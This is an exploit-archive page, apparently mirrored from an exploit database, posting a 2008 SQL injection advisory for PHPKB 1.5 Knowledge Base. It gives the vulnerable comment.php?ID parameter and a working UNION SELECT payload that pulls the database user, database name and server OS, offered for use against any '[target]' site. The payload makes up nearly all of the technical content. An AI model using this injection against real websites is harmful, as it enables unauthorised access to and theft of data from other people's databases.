[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHPKB 1.5 Knowledge Base (ID) SQL Injection Vulnerability
# Published : 2008-04-11
# Author : parad0x
# Previous Title : CcMail <= 1.0.1 Insecure Cookie Handling Vulnerability
# Next Title : PostNuke Module PostSchedule (eid) SQL Injection Vulnerability
PHPKB Knowledge Base Software (comment.php) Sql Injection Vulnerability
-------------------------------------------------------------------------------------------------
# Author : parad0x
# Home : www.inso.host.sk
# Script : PHPKB Knowledge Base Software
# Script Homepage : http://www.knowledgebase-script.com
-------------------------------------------------------------------------------------------------
http://[target]/comment.php?ID=[SQL]
-------------------------------------------------------------------------------------------------
Example:
http://www.xxx.org/comment.php?ID=-67+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/*
-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------
# www.Syue.com [2008-04-11]